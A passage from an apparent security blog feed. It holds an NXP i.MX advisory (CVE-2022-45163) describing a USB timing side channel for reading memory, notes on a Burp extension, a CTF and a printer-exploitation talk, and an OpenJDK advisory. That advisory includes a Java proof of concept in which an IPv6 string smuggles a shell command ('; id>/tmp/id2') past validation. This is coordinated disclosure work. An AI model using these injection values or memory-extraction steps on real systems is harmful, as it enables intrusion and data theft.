Affected Devices: i.MX RT 101x, i.MX RT102x, i.MX RT1050/6x, i.MX 6 Family, i.MX 7 Family, i.MX8M Quad/Mini, Vybrid
Author: Jon Szymaniak <jon.szymaniak(at)nccgroup.com>
CVE: CVE-2022-45163
Advisory URL: https://community.nxp.com/t5/Known-Limitations-and-Guidelines/SDP-Read-Bypass-CVE-2022-45163/ta-p/1553565
Risk: 5.3 (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N), 2.6 if C:L, 0.0 if C:N

Summary

NXP System-on-a-Chip (SoC) fuse configurations with the SDP READ_REGISTER operation disabled (SDP_READ_DISABLE=1) but other serial download functionality still enabled (SDP_DISABLE=0) can be abused to read memory contents in warm and cold boot attack scenarios. In lieu of an enabled SDP READ_REGISTER operation, an attacker can use a series of timed SDP WRITE_DCD commands to execute DCD CHECK_DATA operations, for which USB control transfer response times can be observed to deduce the 1 or 0 state of each successively tested bit within the targeted memory range.

Location

The affected code is located within the immutable read-only memory (ROM) used to bootstrap NXP i.MX Application Processors; it is not customer-updatable.

Impact

Any confidential assets stored in the DDR memory or non-volatile memory mapped registers (e.g. general purpose fuses) associated with the affected chipset could be more easily retrieved by an attacker with physical access to a target device.

The level of effort required to extract memory contents from affected systems without HABv4 enabled (i.e. an “open” device) may be greatly reduced, depending on the accessibility of the SDP interface. Instead of performing memory extraction through execution of malicious firmware, built-in ROM functionality can be abused.

When HABv4 is enabled (i.e. a “closed” device) NCC Group observed a limiting factor — only one DCD could be executed per boot.  The attack is still theoretically possible but requires significantly more overhead between each bit-read attempt to reset or power cycle the target; the data extraction rate becomes limited by how quickly the USB SDP interface can enumerate.

Details

NXP i.MX system-on-a-chip (SoC) devices provide a variety of security features and eFuse-based configuration options that customers can choose to enable, according to their threat model and security requirements. In systems leveraging HABv4 in a “closed” or “secure boot” configuration, software images booted via the UART or USB OTG-based Serial Download Protocol (SDP) must still pass cryptographic signature verification.

For this reason (and based upon NCC Group’s observations during security assessments), some NXP customers may opt to leave the Serial Download Protocol (SDP) boot mode enabled in order to initially bootstrap platforms during manufacturing and/or to execute diagnostic tests. (Although highly discouraged, many do not actually enable HAB due to project schedule limitations or other factors.) Such customers may use the SDP_READ_DISABLE fuse to prevent the SDP READ_REGISTER operation from being abused by a malicious party seeking to extract sensitive information from device memory in either a warm or cold boot attack.

The types of assets regarded as sensitive and requiring strong confidentiality guarantees is expected to vary based upon a variety of factors, including the product markets of NXP’s customers and security expectations of end-users. Examples include, but are not necessarily limited to:

  • Application or protocol-layer authentication tokens
  • Cryptographic key material (not stored in dedicated hardware-backed key storage)
  • DRM or product license information
  • Personally identifiable information (PII) and end-user data including:
    • Location
    • Device usage history
    • Stored or cached multimedia captures
  • Financial or payment card data
  • Trade secrets or other sensitive intellectual property

The boot images supported by NXP i.MX processors may contain “Device Configuration Data” (DCD) sequences, consisting of a limited set of operations (see i.MX6ULLRM Rev 1, 8.7.2 Device Configuration Data). Common use-cases of DCD functionality include clock initialization, configuration of I/O interfaces needed to retrieve a boot loader, and DDR memory controller configuration. For example, DCD functionality can alleviate the need to use multiple boot stages to overcome internal SRAM size limitations; a larger U-Boot “proper” image can be booted directly from NAND instead of requiring a U-Boot SPL to first be executed from internal SRAM to configure DDR for use by the successive U-Boot stage. Oftentimes, an NXP customer can re-use the DCD settings provided in open source reference designs with few, if any, changes.

When a device boot fails, or is otherwise specifically forced, into its Serial Download Protocol (SDP) boot mode, the SDP WRITE_DCD command can be used to send a DCD to a target device to execute.  Below is a sequence diagram illustrating the series of HID reports involved in performing the SDP WRITE_DCD operation. Observe that Report3 is sent by the target device upon completion of DCD execution. Note that the value tresp represents the turnaround time from the host sending its final Report2 and the time at which it receives the Report3 response from the target device.  texec is the amount of time that the target is actually executing the DCD.  The latter is not directly observable, but the former can be treated an estimate of the DCD execution time, with some added overhead.

The DCD CHECK_DATA command can be used to instruct the boot ROM to read a 32-bit value at a specified address and evaluate an expression with it. The expression is defined by “mask” and “set” parameters shown in the following table.

An optional 32-bit count parameter allows this command to be used to repeatedly poll a register until one or more bits are in the desired state. An example use case might be polling “PLL locked” status bits before proceeding to further configure peripheral subsystems.

If the expression is true then the boot ROM moves onto the next operation in the DCD. Otherwise, it will perform upwards of count iterations of the test. If the iteration limit is reached, the boot ROM will move onto the next command. This operation is effectively a no-op (NOP) when a count value of zero is specified. Without a count value, the boot ROM will poll indefinitely. For further clarity, this behavior is described in the following code excerpt.

To summarize:

  • The count parameter is attacker controlled, included in an SDP request
  • texec can be approximated by timing a Report3 response frame
  • The time value can be used to deduce if a bit tested via CHECK_DATA was a 1 or 0.

The behavior describe above allows CHECK_DATA to be abused as an arbitrary memory read primitive, albeit a slow one.  This is the case regardless of the SDP_READ_DISABLE=1 fuse setting which disallows use of the SDP READ_DATA command, and therefore represents a violation of the intended security policy.  Because data stored in DDR memory decays relatively slowly (as opposed to SRAM) when its controller is no longer performing refresh cycles, an attacker may be able to recover desired data on already powered off devices (see Halderman et al.).

Leveraging CHECK_DATA as a DDR memory read primitive, NCC Group collected timing samples for a sweep of different count parameter values on an i.MX6ULL development kit. The bimodal nature of data, shown below, indicates the feasibility of the attack for well-chosen count values.  The following section summarizes a proof of concept, remarks on results, and discusses the practicality of leveraging this in an attack.

Proof of Concept

In order to evaluate the practicality of an attack, NCC Group developed an internal tool called “imemx” to perform memory readout on SDP-enabled NXP i.MX devices, supporting both the standard READ_REGISTER operation and the aforementioned timing side-channel. Given the nature of the vulnerability and the challenges of patching it, we will not be releasing this tool publicly.

Instead, the remainder of this section outlines the high-level process we followed to confirm the vulnerability and evaluate the effectiveness of its exploitation.  Note that the degree of difficulty (or lack thereof) associated with each step largely depends upon factors resulting from design, board layout, and manufacturing decisions made by the NXP customer.

Step 1: Induce Loading of Target Data into Memory

Depending upon the target system, certain (target-specific) actions may need to be performed before assets of interest are decrypted, received, or otherwise loaded into RAM.  A few examples for different types of products are presented below.

  • Powering the device on and waiting short period of time for runtime initialization procedures to complete.
  • Performing basic user interaction with the device
  • Waiting for the device to receive a configuration update via its LTE interface.
  • Pairing the device with a companion mobile application via Bluetooth.
  • Producing sensor stimuli that results in MQTT events being sent to a backend system.

To simplify verification, we wrote a known random pattern to the first few kilobytes of the target address from within the U-Boot boot loader using commands such as mw and loadb.

Step 2: Force Device into SDP Mode

Next, the target device must be forced into its SDP mode of operation.  If the device has not been configured with “Boot from Fuses” setting, this can be achieved by asserting BOOT_MODE[1:0]=0b10 on associated I/O pins during a warm or power-on reset. Otherwise, it is necessary to temporarily induce non-volatile storage access failures during to cause the target device to fail into the SDP boot mode (similar to failing open into a U-Boot console in example 1 or example 2).

For convenience, Figure 8-1 from the i.MX6ULL Reference Manual (i.MX6ULLRM ) is reproduced below.  Observe that the SDP boot mode is reachable via multiple highlighted flows, including the “boot from fuses” setting.

Step 3: Initialize DDR Controller via DCD

In order to perform a warm or cold boot attack on a device, one must first perform any initialization required to interface with the DDR memory. Typically, this is implemented via DCD or in a U-Boot SPL.  For the purposes of this proof-of-concept, we assume the requisite configuration parameters have already been extracted from another device’s non-volatile storage or over-the-air update file.  Also note that it may still be possible to leverage information from open source implementations or third-party reference designs that a product was derived from to produce usable DDR configurations in the well-documented DCD format.

Once a DCD containing sufficient initialization has been prepared (a priori), it can be written to the device using NXP’s Universal Update Utility (UUU):

$ uuu SDP: dcd -f ./target_config.imx
uuu (Universal Update Utility) for nxp imx chips -- libuuu_1.4.107-15-gd1c466c

Success 0    Failure 0                                                                                                                
                                                                                                                                                                                                                                                                            
3:41     1/ 1 [============100%============] SDP: dcd -f ./target_config.imx
Okay

Care must be taken to not send a DDR configuration to the device more than once; doing so was observed to lock up the target. On HAB-enabed devices, only one DCD can be sent per boot. This implies that this step and the following step must be combined, with the DCD containing both the actual target configuration and the CHECK_DATA read primitive. As a result, a larger count value was required (due to the added DCD execution overhead) and only 1 bit per boot could be achieved on HAB-enabled devices. (Our experiment tooling automatically power-cycled the target after each bit-read.)

Step 4: Execute CHECK_DATA-based Memory Readout Attack

Finally, the CHECK_DATA timing side-channel can be exploited. The following invocation reads a 4KiB region of memory, bit-by-bit, starting at address 0x82000000.  The window threshold parameters establish which timing values to consider a 0 or a 1.  Our tool performs retries of any ambiguous results, up to a configurable maximum retry limit.

$ ./imemx -t -t-win-low 75000 -t-win-high 90000 -t-count 0x800 \ 
               -o data.bin -a 0x82000000 -s 4k 

98.88% complete   51.26 B/s    ETA: 00:00:00.90    
---------------------------------------
Completed in 1m19.901131805s
# Retries: 91

The following screenshot shows imemx running while Wireshark monitors the associated USB HID traffic.

Step 5: Analysis

The resulting data can then be analyzed to locate items of interest. For test purposes, vbindiff was used to compare the input test data with the data back from the device.  Some bit-errors are expected due to the slow degradation of DDR contents – the degree of error is expected to increase with the amount of time since the device was powered off.  An excessive number of errors may suggest that more appropriate time thresholds for bit value determination should have been chosen. 

In reality, the (non) triviality of this depends upon the target. API keys and session tokens in HTTP traffic may be conspicuous by virtue of their printable representation. Sensitive data in well-known file formats (e.g. private key in SSLeay format) may be retrieved by simply running binwalk on the memory dump. Other scenarios, however, may require a more complex constraint-driven approach that leverage a priori knowledge (or inferences) about data structure layouts in order to make productive use of tools such as Volatility.  Rather than attempting to extract all of DDR memory, a more efficient approach may be to read only as much memory required to identify per-task kernel data structures, and then leverage these to further deduce the location of active memory mappings.

Conclusions

The limited data rate and expectation of random bit-errors limit the effectiveness of this attack to scenarios in which an attacker would have prolonged access to a device they own, have found, or have stolen.  Ultimately, the value (and lifetime) of potential assets would dictate whether or not a time investment of hours, days, or even weeks constitute a worthwhile effort.  In some situations, this may simply represent an attack that can be run “in the background” while developing and testing a custom OCCAM-resident firmware image to achieve the same result.

Recommendations

NCC Group recommends that affected NXP customers revisit the threat models of their own customers and products and take the following steps, if it is determined that:

  • Prolonged physical access to (lost, stolen) devices is plausible
       AND
  • Sensitive assets or confidential data may reside in DDR RAM

Mitigations

  • Disable SDP in production devices by setting the SDP_DISABLE eFuse bit to 1.
    • If available, also set UART Serial Download Disable eFuse bit to 1.
  • As a matter of security best practice, and especially for NXP devices without CAAM support (e.g. i.MX6ULL), seek to limit the lifetime of sensitive assets (e.g. key material) in memory, immediately overwriting memory locations with zeros or randomized patterns when these assets are no longer immediately needed by software.
  • If self-test or diagnostic functionality is required, implement this via an authenticated diagnostic unlock mechanism (pgs 20-23) in the first non-ROM bootloader stage.
  • If significantly privileged access is required to support failure analysis, with analyzed devices not being returned to the field, consider using HAB authenticated bootloader functionality and using the FIELD_RETURN fuse mechanism to perform a permanent return to an “insecure” diagnostic state.
  • If not doing so already, leverage the CAAM on supported chipsets for cryptographic operations, such that secrets such as key material is neither accessible to software executing on the device, nor ever stored in DDR memory.
  • Although still vulnerable, enabling HAB appears to introduce an additional (data throughput) barrier to practical exploitation.  If doing so is feasible, the use of authenticated boot functionality is encouraged.

While obscuring access to the SDP interface signals through PCB routing strategies or application of tamper-resistant potting or encapsulation compounds is not regarded by NCC Group as a solution, these approaches can impede efforts to exploit the vulnerability documented here.  When performing cost-benefit analyses for remediation efforts, an accurate threat model should first be created and reviewed in order to assess the plausibility of threats and the effectiveness of applied mitigations.

Vendor Communication

2022-08-18 – Draft advisory submitted to NXP PSIRT for coordinated disclosure.
2022-08-18 – NXP PSIRT acknowledges receipt of advisory.
2022-08-23 – NXP PSIRT indicates analysis of report and proof-of-concept are ongoing.
2022-08-31 – NXP confirms NCC Group’s finding of a novel attack and concurs with disabling SDP as being a viable mitigation. NXP PSIRT indicates other affected devices and mitigations are currently being evaluated.
2022-09-13 – NXP provides status update indicating additional time is required to complete product portfolio analysis and communicate with affected customers. 
2022-09-14 – NCC Group extends disclosure deadline by 30 days to accommodate the above.
2022-09-30 – NXP PSIRT provides status update.
2022-10-14 – NXP PSIRT provides status update and requests additional time to communicate with affected customers.
2022-10-14 – NCC Group extends disclosure deadline to Nov. 17th, 2022.
2022-11-11 - NXP PSIRT provides status update and indicates CVE-2022-45163 has been reserved.
2022-11-14 - NCC Group acknowledges receipt of information.
2022-11-15 - NCC Group sends update regarding upcoming publication.
2022-11-17 - NCC Group publishes advisory.

Acknowledgements

Thank you to Jeremy Boone, Jennifer Fernick, and Rob Wood for their always-appreciated, invaluable guidance and support. Additional gratitude is extended to NXP PSIRT for their responsiveness throughout the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. NCC Group Hardware and Embedded Systems Services leverages decades of real-world engineering experience to provide pragmatic guidance on architecture and design, component selection, and manufacturing.

Tool Release – Web3 Decoder Burp Suite Extension

10 November 2022 at 19:13

Web3 Decoder is a Burp Suite Extension that allows to decode “web3” JSON-RPC calls that interact with smart contracts in a EVM blockchain.

As it is said that a picture is worth a thousand words, the following two screenshots shows a Raw JSON-RPC call, and its decoded function call:

Raw eth_call to Ethereum Node
Decoded eth_call to Uniswap

Background

When auditing a DApp (Decentralized Application), its main database would usually be the state of the blockchain, and in particular, the state of a different set of smart contracts deployed in that network. The communication with these smart contract functions is made usually through the use of JSON-RPC calls to a blockchain node, that will be able to query the state of an smart contract, or send a signed transaction that modify its state.

As a pentester, a security auditor, or an enthusiast that wants to better understand what is going on on that DApp, or what smart contracts are being used and how, this is a tedious task, as JSON-RPC call data is RLP encoded. Fortunately for us, it is very common that projects publish their source code and verify their smart contracts in block explorers like Etherscan, and there is where our extension comes in handy, by consulting these block explorers, obtaining the ABI (Application Binary Interface) of the called smart contract, and decoding in a human readable format, its contents for us.

Installation

  1. Clone our github repository: https://github.com/nccgroup/web3-decoder
  2. (Optional). Create a virtualenv or install the application prerequisites in your system (see section below)
  3. Add as a Python extension the file burp_web3_decoder.py
  4. Update your block explorer API keys to be able to perform more than 1 request every 5 seconds (more information on the README.md page)
  5. Start hacking!

We recommend following these instructions on the README.md page of the github repository (which we will keep updated!)

Supporting Python3 Library and Precompiled Binaries

This extension requires python3 libraries like web3.py that unfortunately are not available for python 2.7 to be used directly with Jython 2.7. As a ‘hack’, the main functionality is written in a python 3 library that is being executed by the extension through a python virtual environment (talking about dirty…)

I have created precompiled binaries of the python3 library used, for Linux, Windows and Mac OSX. The extension will use these binaries unless it is able to execute the supporting library, directly or through a python virtual environment.

For better performance or development, you can create a virtualenv, and install as follows:

git clone https://github.com/nccgroup/web3-decoder 
cd "web3-decoder"
virtualenv -p python3 venv
source venv/bin/activate
pip install -r libs/requirements.txt

How It Works

The burp extension creates a new Editor Tab when detecting a valid JSON-RPC request or response. It performs a eth_chainId JSON-RPC request to the node in use to detect which chain we are working on, and depending on the chain, selects a block explorer API, by searching in the chains.json file.

The Extension has the following capabilities

  • Decode of eth_call JSON-RPC calls
  • Decode of eth_sendRawTransaction JSON-RPC calls (and their inner functions)
  • Decode of response results from eth_call
  • Support for re-encoding of eth_call decoded functions
  • Automatic download of the smart contract ABI called from etherscan APIs (if the contract is verified)
  • Decode of function inputs both in eth_call and eth_sendRawTransaction
  • Decode of function inputs that uses “Delegate Proxy” contracts
  • Decode of function inputs called via “Multicall” contracts
  • Manual addition of contract ABIs for contracts that are not verified in etherscan
  • Support for other compatible networks (check the chains.json file)

As an example of use, to decode function calls, we need the ABI (Application Binary Interface) of the contract, which contains all functions that can be called in the contract and their inputs and outputs. For now, it works with verified contracts in the block explorer, or by manually adding the ABI. In future releases, we will explore the possibility of automatically generating an ABI by searching the function selectors in public databases.

The following “flow” diagram shows in a simplified way the process that the eth_decoder library follows when decoding eth_call JSON-RPC calls:

Flow Diagram of decoding an ETH CALL to a smart contract function

Chains Supported so far

All supported chains can be found in the chains.json file.
These are chains that have a block explorer with the same APIs as etherscan.

At the moment of writing, the following list of EVM chains were supported by this extension:

  • Ethereum Mainnet
  • Ropsten
  • Rinkeby
  • Goerli
  • Optimism
  • Cronos
  • Kovan
  • BSC
  • Huobi ECO
  • Polygon
  • Fantom
  • Arbitrum
  • Sepolia
  • Aurora
  • Avalanche

If you want to add more blockchain explorers, add them to the chains.json file, test that it works, and make a pull request! (Or if you are not sure of how to do all this, simply create an issue asking for it!)

Future Work

  • Aggregate other types of Proxy / Multicall contracts
  • Decode Functions without ABI based on public Ethereum signature databases such as 4byte.directory or offline panoramix 4byte signature database

I am always more than happy to consider adding new features to the extension or the supporting library, so feel free to come by the Github page and create an issue with any features that you may want! (or with any bug that you find!)

Check out our new Microcorruption challenges!

31 October 2022 at 17:28

New Microcorruption challenges created by Nick Galloway and Davee Morgan

Today we are releasing several new challenges for the embedded security CTF, Microcorruption. These challenges highlight types of vulnerabilities that NCC Group’s Hardware and Embedded Systems practice have discovered in real products. The new challenges provide a simple interface to explore these vulnerabilities without having to wire up real hardware and without having to deconstruct large complex systems. The Vancouver level will let you brush up on your MSP430 assembly. The Cold Lake and Churchill levels will let you discover and exploit some bootloader-based vulnerabilities we have discovered in the past. Finally, we’ll just let you discover Baku’s secrets on your own. We hope you enjoy these as much as we enjoy discovering vulnerabilities for our clients.

https://microcorruption.com/

Toner Deaf – Printing your next persistence (Hexacon 2022)

17 October 2022 at 08:13

On Friday 14th of October 2022 Alex Plaskett (@alexjplaskett) and Cedric Halbronn (@saidelike) presented Toner Deaf – Printing your next persistence at Hexacon 2022. This talk demonstrated remote over the network exploitation of a Lexmark printer and persistence across both firmware updates and reboots.

The video from this talk is now available here:

The slides for this talk are now available here:

The full abstract for the talk presented was as follows:

In November 2021, NCC Group won at the Pwn2Own hacking contest against a Lexmark printer. This talk is about the journey from purchase of the printer, having zero knowledge of its internals, remotely compromising it using a vulnerability which affected 235 models, developing a persistence mechanism and more.

This talk is particularly relevant due to printers having access to a wide range of documents within an organisation, the printers often being connected to internal/sensitive parts of a network, their lack of detection/monitoring capability and often poor firmware update management processes.

The presentation is divided into the following key sections:

  1. Platform Security: We describe the technical details of hardware attacks on the Lexmark printer to enable unencrypted firmware dumping and visibility into the internals of the platform. We explain the security architecture of the device and strengths/weaknesses of certain components.
  2. Vulnerability Research and Exploitation: We describe a vulnerability identified within the Printer Job Language (PJL) handling code and how this could be exploited to achieve arbitrary file write. We show how this was exploited to obtain a shell on the device.
  3. Getting Persistence: We describe internal mechanisms in place to make it difficult for an attacker to persist, such as a secure boot chain and a locked down file system. We detail a vulnerability which we found that allowed us to gain access to the device both across reboots and firmware updates.

An attendee to this talk should have the following key takeaways:

  • Enhance their knowledge of embedded system security attack and defence
  • Enhance their reverse engineering, vulnerability research and exploitation knowledge
  • For a device vendor this should provide insights into attacker methodology and provide tangible technical feedback in areas which may often be overlooked within a device’s security posture

Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and Related Classes

6 October 2022 at 16:40
Vendor: OpenJDK Project
Vendor URL: https://openjdk.java.net
Versions affected: 8-17+ (and likely earlier versions)
Systems Affected: All supported systems
Author: Jeff Dileo <jeff.dileo[at]nccgroup[dot]com>
Advisory URL / CVE Identifier: TBD
Risk: Low (implicit data validation bypass)

Summary

The private static InetAddress::getAllByName(String,InetAddress) method is used internally and by the public static InetAddress::getAllByName(String) to resolve host or IP strings to IP addresses. It is also used to implement the public static InetAddress::getByName(String) and private static InetAddress::getByName(String,InetAddress) methods. When these methods are passed IP address strings, they will, per the Java documentation, validate the format of the address.

However, the OpenJDK implementation of this method does not conform to the documented API, and does not properly validate the format of a given IP address string, allowing arbitrary characters within IPv6 address strings, including those representing IPv4 addresses. Due to this, any uses of this method to validate host names to protect against injection attacks may be bypassed.

Location

  • src/java.base/share/classes/java/net/InetAddress.java
    • private static int checkNumericZone(String)
    • private static InetAddress[] getAllByName(String,InetAddress)
    • private static InetAddress getByName(String,InetAddress)
    • public static InetAddress getByName(String)
    • public static InetAddress[] getAllByName(String)
  • src/java.base/share/classes/sun/net/util/IPAddressUtil.java
    • public static byte[] textToNumericFormatV6(String)
    • public static byte[] convertFromIPv4MappedAddress(byte[])

Impact

An attacker may trivially bypass the use of InetAddress::getAllByName to validate inputs.

Note: As input validation is not an appropriate mechanism to protect against injection attacks — as opposed to output encoding and Harvard architecture-style APIs — this issue is itself considered to be of Low risk as code relying on the documented validation for such purposes should be considered insecure regardless of this issue.

Details

The static InetAddress::getAllByName method, and the static InetAddress::getByName method it underpins, are used to resolve host strings to IP addresses in the form of java.net.InetAddress objects, specifically the Inet4Address and Inet6Address classes that subclass InetAddress.

These methods accept strings of IP addresses, and, per the Java documentation for the methods, are expected only to validate the format of the address1:

Given the name of a host, returns an array of its IP addresses based on the configured name service on the system.

The host name can either be a machine name, such as “www.example.com”, or a textual representation of its IP address. If a literal IP address is supplied, only the validity of the address format is checked.

For host specified in literal IPv6 address, either the form defined in RFC 2732 or the literal IPv6 address format defined in RFC 2373 is accepted. A literal IPv6 address may also be qualified by appending a scoped zone identifier or scope_id.

However, the underlying implementation for these methods within OpenJDK, the official reference implementation of Java, does not properly implement its IP address parser, specifically its handling of IPv6 scoped address zone identifiers.

Within the InetAddress class implementation, the underlying parsing flow will attempt to parse for IP address strings, and fall back to host name lookup. Within this IP address parsing logic, it will first parse for IPv4 addresses, and then if that parse fails, treat the string as a potential IPv6 address. However, to handle zone identifiers, if the private InetAddress::getAllByName observes a literal percent character (%) within the string, it will pass the string to the private InetAddress::checkNumericZone static method.

addr = IPAddressUtil.textToNumericFormatV4(host);
if (addr == null) {
    // This is supposed to be an IPv6 literal
    // Check if a numeric or string zone id is present
    int pos;
    if ((pos=host.indexOf ('%')) != -1) {
        numericZone = checkNumericZone (host);
        if (numericZone == -1) { /* remainder of string must be an ifname */
            ifname = host.substring (pos+1);
        }
    }
    ...
src/java.base/share/classes/java/net/InetAddress.java

This method incorrectly assumes that a ] character represents the end of the address string, but does not verify that this is the case, only checking to ensure that the ] character does not appear immediately after the %.

for (int i=percent+1; i<slen; i++) {
    char c = s.charAt(i);
    if (c == ']') {
        if (i == percent+1) {
            /* empty per-cent field */
            return -1;
        }
        break;
    }
    ...
src/java.base/share/classes/java/net/InetAddress.java

This is an issue as no such validation occurs earlier within the private InetAddress::getAllByName. Instead, it uses only a simple check that the first and last characters are [ and ], respectively, the format for using literal IPv6 addresses within URLs, in order to remove them.

if (host.charAt(0) == '[') {
    // This is supposed to be an IPv6 literal
    if (host.length() > 2 && host.charAt(host.length()-1) == ']') {
        host = host.substring(1, host.length() -1);
src/java.base/share/classes/java/net/InetAddress.java

Following the call to InetAddress::checkNumericZone, the IPAddressUtil::textToNumericFormatV6 static method is used to actually parse the IPv6 address string into a byte array representation. This method specifically ignores zone identifiers by effectively truncating the content it parses to the last character before the first % if one exists.

char[] srcb = src.toCharArray();
byte[] dst = new byte[INADDR16SZ];

int srcb_length = srcb.length;
int pc = src.indexOf ('%');
if (pc == srcb_length -1) {
    return null;
}

if (pc != -1) {
    srcb_length = pc;
}
src/java.base/share/classes/sun/net/util/IPAddressUtil.java

As a result of each of these components of the IPv6 address parsing logic truncating and/or ignoring data beyond certain metacharacters, InetAddress::getAllByName will accept invalid IPv6 address strings such as the following:

  • ::1%1]foo.bar baz'"
  • [::1%1]foo.bar baz'"]
  • 2606:4700:4700::1111%1]foo.bar baz'"
  • [2606:4700:4700::1111%1]foo.bar baz'"]

This additionally applies to IPv4-compatible IPv6 addresses, such as the following:

  • ::1.1.1.1%1]foo.bar baz '"
  • [::1.1.1.1%1]foo.bar baz '"]
  • ::0101:0101%1]foo.bar baz '"
  • [::0101:0101%1]foo.bar baz '"]

Furthermore, a separate issue exists in the handling of IPv4-mapped IPv6 addresses, as, unlike IPv4-compatible IPv6 addresses, which are parsed into Inet6Address objects, the IPv4-mapped addresses are returned as Inet4Address objects with no concept of an IPv6 scope. This occurs between a special case handled by the static IPAddressUtil::textToNumericFormatV6 method:

if (j != INADDR16SZ)
    return null;
byte[] newdst = convertFromIPv4MappedAddress(dst);
if (newdst != null) {
    return newdst;
} else {
    return dst;
}
src/java.base/share/classes/sun/net/util/IPAddressUtil.java

The static IPAddressUtil::convertFromIPv4MappedAddress method will return a byte array of size 4 (INADDR4SZ) containing the IPv4 address bytes from the byte array representation of the address string, should it match the structure of an IPv4-mapped IPv6 address:

public static byte[] convertFromIPv4MappedAddress(byte[] addr) {
    if (isIPv4MappedAddress(addr)) {
        byte[] newAddr = new byte[INADDR4SZ];
        System.arraycopy(addr, 12, newAddr, 0, INADDR4SZ);
        return newAddr;
    }
    return null;
}
src/java.base/share/classes/sun/net/util/IPAddressUtil.java

When such a byte array is returned back to the private InetAddress::getAllByName static method, it will then be used to return an Inet4Address.

InetAddress[] ret = new InetAddress[1];
if(addr != null) {
    if (addr.length == Inet4Address.INADDRSZ) {
        ret[0] = new Inet4Address(null, addr);
    } else {
        if (ifname != null) {
            ret[0] = new Inet6Address(null, addr, ifname);
        } else {
            ret[0] = new Inet6Address(null, addr, numericZone);
        }
    }
    return ret;
}
src/java.base/share/classes/java/net/InetAddress.java

Due to this, any arbitrary scope value can be provided, as the ifname variable would only be validated in the Inet6Address(String,byte[],String) constructor, regardless of if it being set due to InetAddress::checkNumericZone rejecting the address string. As a result, InetAddress::getAllByName will additionally accept invalid IPv4-mapped IPv6 address strings such as the following:

  • ::ffff:1.1.1.1%1]foo.bar baz'"
  • [::ffff:1.1.1.1%1]foo.bar baz'"]
  • ::ffff:0101:0101%1]foo.bar baz'"
  • [::ffff:0101:0101%1]foo.bar baz'"]
  • ::ffff:1.1.1.1%1foo.bar baz'"
  • [::ffff:1.1.1.1%1foo.bar baz'"]
  • ::ffff:0101:0101%1foo.bar baz'"
  • [::ffff:0101:0101%1foo.bar baz'"]

Technical Recommendation

Modify the InetAddress::checkNumericZone static method to remove the iteration check for ] characters as it should never be passed a string containing [ or ] characters. This will force all characters after the % to be parsed as a non-negative base 10 integer, or rejected.

Additionally, modify the private InetAddress::getAllByName static method to handle length 4 byte arrays returned by IPAddressUtil::textToNumericFormatV4 and IPAddressUtil::textToNumericFormatV6 differently, such that those returned by the latter do not contain any % characters.

Additionally, or alternatively to the above remediations, consider reimplementing the entire public InetAddress::{getAllByName,getByName} interface along the lines of the Android implementation, which parses IP addresses extremely strictly, and allows interface name IPv6 scoped zone identifiers only for link-local addresses.234567 It is worth noting that the Android implementation additionally validates interface name IPv6 scoped zone identifiers against the system network interfaces,8 such a construction is, while not invalid per the InetAddress and Inet6Address Java documentation, arguably not in the spirit of them either as these APIs are intended for general-purpose IP address operations, including address representations that do not necessarily refer to the interfaces of the host operating on them. Instead, consider introducing an additional API for the InetAddress class whereby a getAllByName or getByName operation is performed with such additional, host-specific validation.

Developer Recommendation

Ensure that hostname and IP address values are handled securely and output-encoded or sanitized in a context appropriate manner. Do not rely on methods such as InetAddress::getByName(String) or InetAddress::getAllByName(String) to validate or sanitize external inputs.

An example demonstrating vulnerable code relying on InetAddress::getByName(String) is included for reference:

Note: When run, an injection will occur in the ping(String) function, resulting in a file, /tmp/id2, being created with the output of the id program on Unix-based systems.

import java.net.InetAddress;

class Ping {
  public static boolean validateHost(String host) {
    try {
      InetAddress address = InetAddress.getByName(host);
    } catch (Throwable t) {
      return false;
    }
    return true;
  }

  public static int ping(String host) {
    try {
      Process p = new ProcessBuilder(
        "/bin/sh", "-c", "ping -c 1 '" + host + "'"
      ).start();
      p.waitFor();
      return p.exitValue();
    } catch (Throwable t) {
      t.printStackTrace();
      return -1;
    }
  }

  public static void test(String[] hosts) {
    for (String host : hosts) {
      System.out.println("  testing `" + host + "`:");
      boolean valid = validateHost(host);
      System.out.println("    valid?: " + valid);
      if (valid) {
        int retcode = ping(host);
        boolean reachable = 0 == retcode;
        System.out.println(
          "    reachable?: " + reachable + " (" + retcode + ")"
        );
      }
    }
  }

  public static void main(String[] argv) throws Throwable {
    String[] good_inputs = new String[]{
      "127.0.0.1", "wikipedia.org"
    };
    String[] bad_inputs = new String[]{
      "https://wikipedia.org", "127.0.0.1; id>/tmp/id"
    };
    String[] evil_inputs = new String[]{
      "::1%1]foo.bar baz'; id>/tmp/id2; exit '42"
    };
    System.out.println("testing good inputs: (these should work)");
    test(good_inputs);
    System.out.println("testing bad inputs: (these should not work)");
    test(bad_inputs);
    System.out.println("testing evil inputs: (these work, but shouldn't)");
    test(evil_inputs);
  }
}
$ java Ping
testing good inputs: (these should work)
  testing `127.0.0.1`:
    valid?: true
    reachable?: true (0)
  testing `wikipedia.org`:
    valid?: true
    reachable?: true (0)
testing bad inputs: (these should not work)
  testing `https://wikipedia.org`:
    valid?: false
  testing `127.0.0.1; id>/tmp/id`:
    valid?: false
testing evil inputs: (these work, but shouldn't)
  testing `::1%1]foo.bar baz'; id>/tmp/id2; exit '42`:
    valid?: true
    reachable?: false (42)

Vendor Communication

2/17/22: NCC Group disclosed vulnerability to the security email of the OpenJDK
         project, [email protected], using their PGP key.
2/17/22: NCC Group receives a reply from Oracle's Security Alerts team
         ([email protected]) indicating that they have received the
         disclosure and will get back to NCC Group on it.
2/18/22: The Oracle Security Alerts team emails NCC Group asking about
         NCC Group's 30 day disclosure policy and notes that they release
         "Critical Patch Updates 4 times in a year," and requests an extension
         to after the upcoming one on April 19, 2022 (i.e. the July 2022
         update).
2/19/22: NCC Group replies, indicating a willingness to wait until April 19th.
2/22/22: The Oracle Security Alerts team replies, thanking NCC Group for the
         extension.
2/24/22: NCC Group receives an automated status report email from the
         [email protected] issue tracker, with the description
         "Weak Parsing Logic in java.net.InetAddress and Related Classes" and a
         status of "Issue addressed in future release, backports in progress
         for supported releases, scheduled for a future CPU"
3/3/22:  The Oracle Security Alerts team replies indicating that they consider
         the vulnerability to be "Security-in-Depth issue", and additionally
         that "the CVSS score for this issue is zero." They state that it will
         be addressed in a future update and then that because they are locking
